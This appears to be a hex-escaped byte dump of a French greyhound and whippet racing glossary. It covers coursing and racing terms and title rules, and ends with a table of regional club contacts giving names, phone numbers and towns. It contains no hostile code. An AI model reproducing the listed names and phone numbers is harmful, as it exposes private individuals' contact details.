-"\x73\x20\x31\x20\x43\x41\x43\x53\x20\x65\x74\x20\x31\x20\x52\x43" -"\x41\x43\x53\x29\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x72\x73" -"\x65\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x32\x20\x65\x78" -"\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65\x74\x20\x75\x6e\x20\x63" -"\x68\x72\x6f\x6e\x6f\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65" -"\x29\x20\x73\x65\x6c\x6f\x6e\x20\x62\x61\x72\xe8\x6d\x65\x20\x63" -"\x6f\x6d\x70\x65\x6e\x73\x61\x74\x65\x75\x72\x2e\x0d\x45\x78\x20" -"\x3a\x20\x32\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65" -"\x74\x20\x70\x61\x72\x74\x69\x63\x69\x70\x61\x74\x69\x6f\x6e\x20" -"\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x53\x43\x43\x20\x73" -"\x75\x66\x66\x69\x73\x65\x6e\x74\x20\x65\x6e\x20\x63\x6f\x75\x72" -"\x73\x65\x20\xe0\x20\x75\x6e\x20\x74\x69\x74\x75\x6c\x61\x69\x72" -"\x65\x20\x64\x65\x20\x32\x20\x43\x41\x43\x49\x42\x2e\x0d\x0d\x50" -"\x6f\x75\x72\x73\x75\x69\x74\x65\x3a\x0d\x09\x4c\x65\x73\x20\x6c" -"\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x6f\x69\x76\x65\x6e\x74\x20" -"\x61\x76\x6f\x69\x72\x20\x6f\x62\x74\x65\x6e\x75\x20\x6c\x65\x73" -"\x20\x6d\xea\x6d\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73" -"\x20\x65\x6e\x20\x42\x65\x61\x75\x74\xe9\x20\x71\x75\x65\x20\x63" -"\x69\x2d\x64\x65\x73\x73\x75\x73\x2c\x20\x69\x6c\x73\x20\x64\x65" -"\x76\x72\x6f\x6e\x74\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x20\x61" -"\x76\x6f\x69\x72\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20" -"\x64\x65\x75\x78\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20" -"\x65\x6e\x20\x50\x56\x4c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x27" -"\x75\x6e\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe9\x74\x72\x61\x67\x65" -"\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x71\x75\x27\x69\x6c" -"\x73\x20\x6f\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20\x75" -"\x6e\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x41\x20\x73\x75\x72" -"\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x37\x35\x20\x6d\xe8\x74" -"\x72\x65\x73\x2e\x0d\x0d\x4d\x69\x78\x74\x65\x3a\x0d\x09\x4c\x65" 
-"\x20\x74\x69\x74\x72\x65\x20\x70\x6f\x75\x72\x72\x61\x20\xea\x74" -"\x72\x65\x20\x6f\x62\x74\x65\x6e\x75\x20\x61\x76\x65\x63\x20\x64" -"\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20" -"\x45\x4e\x43\x20\x65\x74\x20\x65\x6e\x20\x50\x56\x4c\x2e\x0d\x0d" -"\x09\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x64\x65\x20\x6c" -"\x61\x20\x53\x43\x43\x20\x3a\x20\x0d\x43\x6f\x75\x72\x73\x65\x20" -"\x72\xe9\x73\x65\x72\x76\xe9\x65\x20\x61\x75\x78\x20\x6c\xe9\x76" -"\x72\x69\x65\x72\x73\x20\x74\x69\x74\x75\x6c\x61\x69\x72\x65\x73" -"\x20\x64\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e" -"\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x73\x20\x61\x76\x65" -"\x63\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x52\x43\x41" -"\x43\x53\x20\x2b\x20\x75\x6e\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e" -"\x74\x2c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x92\x75\x6e\x20\x65" -"\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x6f\x75\x20\x64\x65\x75\x78" -"\x20\x74\x72\xe8\x73\x20\x62\x6f\x6e\x20\x65\x6e\x20\x45\x4e\x43" -"\x2e\x20\x4c\x61\x20\x76\x69\x63\x74\x6f\x69\x72\x65\x20\x65\x73" -"\x74\x20\x70\x6f\x72\x74\xe9\x65\x20\x61\x75\x20\x70\x65\x64\x69" -"\x67\x72\x65\x65\x20\x28\x47\x50\x58\x29\x2e\x20\x0d\x0d\x09\x43" -"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x27\x45\x75\x72" -"\x6f\x70\x65\x20\x65\x74\x20\x64\x75\x20\x4d\x6f\x6e\x64\x65\x20" -"\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x3a\x0d\x4f\x72\x67\x61" -"\x6e\x69\x73\x61\x74\x69\x6f\x6e\x20\x61\x6e\x6e\x75\x65\x6c\x6c" -"\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x66\x72\x6f\x6e\x74" -"\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x6d\x65\x69\x6c\x6c\x65" -"\x75\x72\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x73\xe9\x6c" -"\x65\x63\x74\x69\x6f\x6e\x6e\xe9\x73\x20\x70\x61\x72\x20\x63\x68" -"\x61\x71\x75\x65\x20\x70\x61\x79\x73\x20\x6d\x65\x6d\x62\x72\x65" -"\x2c\x20\x70\x61\x72\x20\x72\x61\x63\x65\x20\x65\x74\x20\x70\x61" -"\x72\x20\x73\x65\x78\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69" 
-"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x20" -"\x64\x65\x20\x50\x56\x4c\x20\x3a\x0d\x45\x70\x72\x65\x75\x76\x65" -"\x20\x72\xe9\x63\x6f\x6d\x70\x65\x6e\x73\x61\x6e\x74\x20\x6c\x65" -"\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x20\x6c\xe9\x76\x72\x69\x65" -"\x72\x20\xe4\x6e\x20\x45\x50\x56\x4c\x2c\x20\x63\x68\x61\x71\x75" -"\x65\x20\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x42\x72\x61\x73\x73" -"\x6f\x6b\x20\x3a\x20\x0d\x50\x6c\x6f\x6e\x67\x65\x6f\x6e\x20\x64" -"\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x73\x75\x72\x20\x6c\x65" -"\x20\x6c\x65\x75\x72\x72\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69" -"\x76\xe9\x65\x2c\x20\x72\x61\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c" -"\x61\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x65\x6d\x70\x6c" -"\x6f\x79\xe9\x65\x20\x70\x6f\x75\x72\x20\x74\x75\x65\x72\x20\x75" -"\x6e\x20\x61\x70\x70\xe2\x74\x20\x76\x69\x76\x61\x6e\x74\x2e\x0d" -"\x0d\x09\x41\x74\x74\x61\x71\x75\x65\x20\x3a\x0d\x4d\x6f\x75\x76" -"\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72" -"\x20\x76\x65\x72\x73\x20\x75\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72" -"\x65\x6e\x74\x2c\x20\x61\x75\x20\x63\x6f\x75\x72\x73\x20\x64\x75" -"\x71\x75\x65\x6c\x20\x6c\x65\x20\x66\x61\x75\x74\x69\x66\x20\x71" -"\x75\x69\x74\x74\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20" -"\x64\x65\x73\x20\x79\x65\x75\x78\x2e\x20\x4c\x27\x61\x74\x74\x61" -"\x71\x75\x65\x20\x6e\x65\x20\x73\x69\x67\x6e\x69\x66\x69\x65\x20" -"\x6e\x75\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x75\x6e\x65\x20\x76\x6f" -"\x6c\x6f\x6e\x74\xe9\x20\x61\x67\x72\x65\x73\x73\x69\x76\x65\x2c" -"\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x75\x20\x6a\x65\x75\x2e" -"\x0d\x0d\x09\x42\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x3a\x0d" -"\x4d\x6f\x75\x76\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76" -"\x72\x69\x65\x72\x20\x71\x75\x69\x20\x73\x61\x6e\x73\x20\x71\x75" -"\x69\x74\x74\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20" -"\x64\x65\x73\x20\x79\x65\x75\x78\x20\x65\x73\x74\x20\x64\xe9\x70" 
-"\x6f\x72\x74\xe9\x20\x6f\x75\x20\x73\x65\x20\x66\x61\x69\x74\x20" -"\x64\x65\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x6f" -"\x75\x70\x73\x20\x64\x27\xe9\x70\x61\x75\x6c\x65\x20\x6f\x75\x20" -"\x64\x65\x20\x68\x61\x6e\x63\x68\x65\x2e\x20\x4c\x61\x20\x62\x6f" -"\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x6e\x27\x65\x73\x74\x20\x70" -"\x61\x73\x20\x75\x6e\x20\x61\x63\x74\x65\x20\x66\x61\x75\x74\x69" -"\x66\x2c\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x65\x6c\x6c\x65\x20" -"\x70\x72\x6f\x76\x6f\x71\x75\x65\x20\x6c\x61\x20\x63\x68\x75\x74" -"\x65\x20\x64\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9\x2e\x0d\x0d" -"\x09\x4f\x75\x76\x72\x65\x75\x72\x20\x3a\x0d\x4c\xe9\x76\x72\x69" -"\x65\x72\x20\x6e\x6f\x6e\x20\x65\x6e\x67\x61\x67\xe9\x20\x71\x75" -"\x69\x20\x6f\x75\x76\x72\x65\x20\x6c\x61\x20\x72\xe9\x75\x6e\x69" -"\x6f\x6e\x20\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x63\x61" -"\x74\x69\x6f\x6e\x20\x64\x75\x20\x6d\x61\x74\xe9\x72\x69\x65\x6c" -"\x2e\x0d\x0d\x09\x4f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73" -"\x20\x64\x65\x20\x76\x69\x72\x61\x67\x65\x20\x3a\x0d\x41\x6e\x63" -"\x69\x65\x6e\x6e\x65\x6d\x65\x6e\x74\x20\x43\x6f\x6d\x6d\x69\x73" -"\x73\x61\x69\x72\x65\x2e\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20" -"\x61\x67\x72\xe9\xe9\x65\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x2e" -"\x4c\x2e\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70\x72\x6f" -"\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x65\x78\x70\xe9\x72" -"\x69\x6d\x65\x6e\x74\xe9\x73\x20\x65\x74\x20\x71\x75\x69\x20\x73" -"\x65\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x68\x61\x71\x75\x65" -"\x20\x76\x69\x72\x61\x67\x65\x73\x20\x70\x6f\x75\x72\x20\x64\x6f" -"\x6e\x6e\x65\x72\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x73\x75" -"\x72\x20\x6c\x65\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e" -"\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x2e\x20\x4c\x65" -"\x20\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x6c\x69\x62\x72\x65\x20" -"\x64\x65\x20\x73\x75\x69\x76\x72\x65\x20\x6f\x75\x20\x6e\x6f\x6e" 
-"\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x28\x63\x6f\x6d\x6d\x65" -"\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x64\x65\x20\x74\x6f\x75\x63" -"\x68\x65\x20\x65\x6e\x20\x66\x6f\x6f\x74\x62\x61\x6c\x6c\x20\x6f" -"\x75\x20\x65\x6e\x20\x72\x75\x67\x62\x79\x29\x2e\x0d\x51\x75\x61" -"\x6e\x64\x20\x69\x6c\x20\x61\x20\x76\x75\x20\x75\x6e\x65\x20\x66" -"\x61\x75\x74\x65\x2c\x20\x69\x6c\x20\x6c\xe8\x76\x65\x20\x6c\x65" -"\x20\x62\x72\x61\x73\x20\x6f\x75\x20\x75\x6e\x20\x66\x61\x6e\x69" -"\x6f\x6e\x2e\x20\x0d\x0d\x09\x50\x61\x64\x64\x6f\x63\x6b\x3a\x20" -"\x0d\x5a\x6f\x6e\x65\x20\x64\xe9\x6c\x69\x6d\x69\x74\xe9\x65\x20" -"\x70\x61\x72\x20\x64\x65\x73\x20\x63\x6f\x72\x64\x61\x67\x65\x73" -"\x20\x57\xf9\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73" -"\x20\x73\x6f\x6e\x74\x20\x73\x6f\x75\x6d\x69\x73\x20\x61\x75\x78" -"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x73\x20\x74\x65\x63\x68\x6e" -"\x69\x71\x75\x65\x73\x20\x65\x74\x20\x61\x74\x74\x65\x6e\x64\x65" -"\x6e\x74\x20\x6c\x27\x6f\x72\x64\x72\x65\x20\x64\x27\x61\x6c\x6c" -"\x65\x72\x20\x61\x75\x78\x20\x62\x6f\x69\x74\x65\x73\x20\x64\x65" -"\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d\x0d\x09\x53\x74\x61\x72\x74" -"\x65\x72\x3a\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20\x71\x75\x69" -"\x20\x64\x6f\x6e\x6e\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74" -"\x20\x65\x6e\x20\x6f\x75\x76\x72\x61\x6e\x74\x20\x6c\x65\x73\x20" -"\x62\x6f\x69\x74\x65\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x69\x73" -"\x74\x65\x3a\x0d\x52\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20" -"\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x64\x75\x69\x74\x65\x20\x64" -"\x75\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x6e\x20\x52\x61\x63\x69" -"\x6e\x67\x2e\x0d\x0d\x09\x43\x6f\x6e\x64\x75\x63\x74\x65\x75\x72" -"\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x3a\x0d\x52\x65\x73" -"\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x64\x65\x20\x6c\x61\x20\x63" -"\x6f\x6e\x64\x75\x69\x74\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72" -"\x65\x20\x65\x6e\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x20\x0d\x53" 
-"\x6f\x6e\x20\x72\xf4\x6c\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73" -"\x69\x64\xe9\x72\x61\x62\x6c\x65\x20\x65\x74\x20\x6c\x65\x73\x20" -"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x64\x65\x20\x6e\x6f" -"\x6d\x69\x6e\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x70\x6c\x75\x73" -"\x20\x65\x6e\x20\x70\x6c\x75\x73\x20\x73\xe9\x76\xe8\x72\x65\x73" -"\x2e\x0d\x0d\x09\x41\x6d\x69\x63\x61\x6c\x65\x3a\x0d\x45\x70\x72" -"\x65\x75\x76\x65\x20\x6e\x6f\x6e\x2d\x6f\x66\x66\x69\x63\x69\x65" -"\x6c\x6c\x65\x20\x6f\x72\x67\x61\x6e\x69\x73\xe9\x65\x20\x70\x61" -"\x72\x20\x75\x6e\x20\x63\x6c\x75\x62\x20\x61\x67\x72\xe9\xe9\x20" -"\x73\x65\x6c\x6f\x6e\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65" -"\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x70\x6f" -"\x75\x76\x61\x6e\x74\x20\xea\x74\x72\x65\x20\x64\x6f\x74\xe9\x65" -"\xa2\x64\x65\x20\x70\x72\x69\x78\x20\x65\x6e\x20\x65\x73\x70\xe8" -"\x63\x65\x73\x2e\x20\x4c\x61\x20\x73\x65\x75\x6c\x65\x20\x63\x6f" -"\x6e\x74\x72\x61\x69\x6e\x74\x65\x20\x65\x73\x74\x20\x64\x27\x69" -"\x6e\x66\x6f\x72\x6d\x65\x72\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20" -"\x65\x74\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x61" -"\x6e\x69\x6e\x65\x20\x6c\x6f\x63\x61\x6c\x65\x2e\x20\x4f\x6e\x20" -"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x6f\x72\x67\x61" -"\x6e\x69\x73\x65\x72\x20\x64\x27\x61\x6d\x69\x63\x61\x6c\x65\x20" -"\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x27\x75\x6e\x65\x20\xe9\x70" -"\x72\x65\x75\x76\x65\x20\x70\x72\x6f\x74\xe9\x67\xe9\x65\x20\x6f" -"\x75\x20\xff\x27\x69\x6c\x20\x79\x20\x61\x20\x20\x72\x69\x73\x71" -"\x75\x65\x20\x64\x65\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63" -"\x65\x72\x20\x75\x6e\x65\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f" -"\x66\x66\x69\x63\x69\x65\x6c\x6c\x65\x2e\x0d\x0d\x09\x54\x72\x6f" -"\x70\x68\xe9\x65\x2c\x20\x44\x65\x72\x62\x79\x2e\x2e\x2e\x0d\x41" -"\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x73\x20\x70\x72\x6f\x70" -"\x72\x65\x73\x20\xe0\x20\x75\x6e\x65\x20\x61\x6d\x69\x63\x61\x6c" 
-"\x65\x20\x64\x65\x20\x43\x6c\x75\x62\x20\x6f\x75\x20\x64\x65\x20" -"\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x70\x6f" -"\x75\x72\x20\x6d\x69\x65\x75\x78\x20\x72\x65\x74\x65\x6e\x69\x72" -"\x20\x6c\x27\x61\x74\x74\x65\x6e\x74\x69\x6f\x6e\x2e\x0d\x0d\x09" -"\x53\x75\x73\x70\x65\x6e\x73\x69\x6f\x6e\x3a\x0d\x46\x61\x75\x74" -"\x65\x20\x6c\xe9\x67\xe8\x72\x65\x20\x70\x61\x72\x20\x6d\x61\x6e" -"\x71\x75\x65\x20\x64\x27\x61\x72\x64\x65\x75\x72\x2e\x0d\x0d\x09" -"\x44\x69\x73\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e" -"\x3a\x0d\x46\x61\x75\x74\x65\x20\x67\x72\x61\x76\x65\x20\x6e\x75" -"\x69\x73\x61\x6e\x74\x20\xe0\x20\x61\x75\x74\x72\x75\x69\x20\x65" -"\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x65\x20\x70\x61\x72\x20" -"\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x09" -"\x43\x68\x61\x75\x76\x69\x6e\x69\x73\x6d\x65\x3a\x0d\x56\x6f\x74" -"\x72\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x6e\x65\x20\x73\x65" -"\x72\x61\x20\x70\x61\x73\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74" -"\x20\x6c\x65\x20\x70\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c" -"\x20\x6d\x61\x69\x73\x20\x70\x6f\x75\x72\x20\x76\x6f\x75\x73\x2c" -"\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6c\x65\x20\x70\x6c\x75\x73" -"\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x2c\x20\x6c\x65" -"\x20\x70\x6c\x75\x73\x20\x62\x65\x61\x75\x2c\x20\x6c\x65\x20\x70" -"\x6c\x75\x73\x20\x67\x65\x6e\x74\x69\x6c\x2e\x20\x4e\x27\x61\x64" -"\x6d\x65\x74\x74\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x27\x6f\x6e" -"\x20\x6c\x65\x20\x64\xe9\x6e\x69\x67\x72\x65\x2c\x20\x70\x61\x73" -"\x20\x70\x6c\x75\x73\x20\x71\x75\x65\x20\x73\x6f\x6e\x20\xe9\x6c" -"\x65\x76\x65\x75\x72\x20\x6f\x75\x20\x73\x6f\x6e\x20\x63\x6c\x75" -"\x62\x2e\x20\x4e\x65\x20\x6c\x65\x20\x66\x61\x69\x74\x65\x73\x20" -"\x70\x61\x73\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75\x74" -"\x72\x65\x73\x2e\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d" -"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d" 
-"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x41\x20\x71\x75\x69" -"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f" -"\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x20\x72\x65\x6e\x73\x65" -"\x69\x67\x6e\x65\x6d\x65\x6e\x74\x20\x74\x65\x63\x68\x6e\x69\x71" -"\x75\x65\x20\x6f\x75\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61" -"\x74\x69\x66\x20\x3a\x09\x41\x20\x76\x6f\x74\x72\x65\x20\x63\x6c" -"\x75\x62\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x61\x67" -"\x72\xe9\xe9\x20\x3a\x0d\x0d\x36\x38\x07\x41\x4c\x53\x41\x43\x45" -"\x07\x4d\x6d\x65\x20\x53\x63\x68\x65\x72\x72\x65\x72\x07\x30\x33" -"\x2e\x38\x39\x2e\x34\x30\x2e\x35\x39\x2e\x31\x30\x07\x42\x65\x74" -"\x74\x65\x6e\x64\x6f\x72\x66\x07\x50\x56\x4c\x07\x07\x37\x36\x07" -"\x41\x43\x43\x4c\x07\x4d\x2e\x20\x47\x61\x72\x72\x61\x75\x6c\x74" -"\x07\x30\x32\x2e\x33\x35\x2e\x34\x34\x2e\x38\x31\x2e\x36\x33\x07" -"\x4d\x61\x6e\x6e\x65\x76\x69\x6c\x65\x74\x74\x65\x07\x45\x4e\x43" -"\x07\x07\x36\x36\x07\x41\x43\x4c\x53\x07\x4d\x6d\x65\x20\x4d\x61" -"\x73\x61\x6e\x61\x07\x30\x34\x2e\x36\x38\x2e\x39\x32\x2e\x37\x32" -"\x2e\x34\x30\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x50\x56" -"\x4c\x20\x2b\x20\x45\x4e\x43\x07\x07\x31\x32\x07\x41\x43\x4c\x41" -"\x43\x54\x41\x07\x4d\x2e\x20\x47\x61\x79\x72\x61\x72\x64\x07\x30" -"\x35\x2e\x36\x35\x2e\x36\x33\x2e\x33\x36\x2e\x33\x32\x07\x43\x72" -"\x61\x6e\x73\x61\x63\x20\x6c\x65\x73\x20\x54\x65\x72\x6d\x65\x73" -"\x07\x45\x4e\x43\x07\x07\x39\x34\x07\x41\x53\x4c\x4c\x07\x4d\x6d" -"\x65\x20\x41\x6e\x73\x61\x6c\x64\x69\x20\x4a\x61\x63\x71\x75\x65" -"\x74\x07\x30\x31\x2e\x36\x39\x2e\x33\x31\x2e\x30\x35\x2e\x36\x39" -"\x07\x4e\x65\x75\x69\x6c\x6c\x79\x20\x73\x75\x72\x20\x4d\x61\x72" -"\x6e\x65\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73" -"\x07\x07\x39\x30\x07\x43\x43\x43\x07\x4d\x6d\x65\x20\x4c\x69\x6e" -"\x64\x65\x6b\x65\x72\x07\x30\x33\x2e\x38\x34\x2e\x32\x39\x2e\x30" -"\x31\x2e\x37\x31\x07\x42\x65\x6c\x66\x6f\x72\x74\x07\x37\x56\x4c" 
-"\x07\x07\x34\x34\x07\x43\x43\x43\x41\x07\x4d\x2e\x20\x4d\x61\x67" -"\x72\xe9\x07\x30\x32\x2e\x34\x30\x2e\x38\x38\x2e\x38\x39\x2e\x38" -"\x38\x07\x48\x65\x72\x62\x69\x67\x6e\x61\x63\x07\x50\x56\x4c\x07" -"\x07\x37\x31\x07\x43\x43\x4c\x42\x07\x4d\x2e\x20\x42\x6f\x75\x72" -"\x61\x73\x73\x65\x74\x07\x30\x34\x2e\x37\x34\x2e\x35\x35\x2e\x31" -"\x33\x2e\x30\x34\x07\x4d\xe2\x63\x6f\x6e\x07\x50\x56\x4c\x07\x07" -"\x32\x36\x07\x43\x43\x4c\x56\x07\x4d\x6c\x6c\x65\x20\x4c\x6f\x6d" -"\x62\x61\x72\x64\x07\x30\x34\x2e\x37\x35\x2e\x38\x33\x2e\x37\x32" -"\x2e\x38\x32\x07\x56\x61\x6c\x65\x6e\x63\x65\x07\x45\x6e\x74\x72" -"\x61\x69\x6e\x74\x73\x20\x50\x56\x4c\x07\x07\x31\x36\x07\x43\x45" -"\x19\x43\x07\x4d\x6d\x65\x20\x4c\x61\x6c\x65\x6d\x65\x6e\x64\x07" -"\x30\x35\x2e\x34\x35\x2e\x36\x37\x2e\x39\x35\x2e\x38\x31\x07\x4d" -"\x61\x6e\x73\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32" -"\x39\x07\x43\x4c\x41\x4d\x07\x4d\x2e\x20\x4c\x65\x67\x75\x65\x73" -"\x67\x75\x65\x07\x30\x32\x2e\x39\x38\x2e\x37\x32\x2e\x34\x34\x2e" -"\x34\x32\x07\x4d\x6f\x72\x6c\x61\x69\x78\x07\x50\x56\x4c\x07\x07" -"\x33\x33\x07\x43\x4c\x43\x07\x4d\x6c\x6c\x65\x20\x4d\x6f\x6e\x69" -"\x6f\x74\x07\x30\x36\x2e\x30\x37\x2e\x33\x37\x2e\x37\x33\x2e\x31" -"\x39\x07\x53\x74\x20\x44\x65\x6e\x69\x73\x20\x64\x65\x20\x50\x69" -"\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x36\x32\x07\x43" -"\x4c\x43\x41\x07\x4d\x2e\x20\x42\x65\x6e\x6f\x69\x74\x07\x30\x33" -"\x2e\x32\x31\x2e\x31\x32\x2e\x37\x30\x2e\x33\x30\x07\x41\x69\x72" -"\x20\x73\x2f\x4c\x79\x73\x07\x45\x4e\x43\x07\x07\x37\x38\x07\x43" -"\x4c\x43\x49\x46\x07\x4d\x2e\x20\x4c\x65\x66\xe8\x76\x72\x65\x07" -"\x30\x32\x2e\x33\x32\x2e\x33\x38\x2e\x34\x36\x2e\x32\x33\x07\x4d" -"\x65\x75\x6c\x61\x6e\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x34" -"\x30\x07\x43\x55\x4c\x43\x4c\x07\x4d\x2e\x20\x4c\x75\x63\x61\x6e" -"\x74\x6f\x6e\x69\x6f\x07\x30\x35\x2e\x36\x32\x2e\x34\x35\x2e\x30" -"\x33\x2e\x35\x31\x07\x4d\x6f\x6e\x74\x20\x64\x65\x20\x4d\x61\x72" 
-"\x73\x61\x6e\x07\x45\x4e\x43\x2b\x45\x6e\x74\x72\x2e\x50\x56\x4c" -"\x07\x07\x37\x32\x07\x43\x4c\x43\x4d\x07\x4d\x2e\x20\x46\x65\x6c" -"\x64\x65\x72\x07\x30\x36\x2e\x38\x32\x2e\x33\x39\x2e\x37\x32\x2e" -"\x36\x35\x07\x50\x61\x72\x69\x67\x6e\xe9\x20\x6c\x27\x45\x76\xea" -"\x71\x75\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x33\x38\x07" -"\x43\x4c\x44\x53\x07\x4d\x6d\x65\x20\x43\x61\x69\x6c\x6c\x61\x74" -"\x07\x30\x34\x2e\x37\x36\x2e\x36\x38\x2e\x32\x39\x2e\x39\x35\x07" -"\x56\x69\x7a\x69\x6c\x6c\x65\x07\x50\x56\x4c\x07\x07\x37\x37\x07" -"\x43\x4c\x43\x42\x07\x4d\x6d\x65\x20\x50\x61\x69\x6c\x6c\x65\x74" -"\x07\x30\x31\x2e\x36\x34\x2e\x30\x36\x2e\x36\x38\x2e\x31\x34\x07" -"\x4c\x69\x76\x65\x72\x64\x79\x07\x45\x4e\x43\x07\x07\x33\x37\x07" 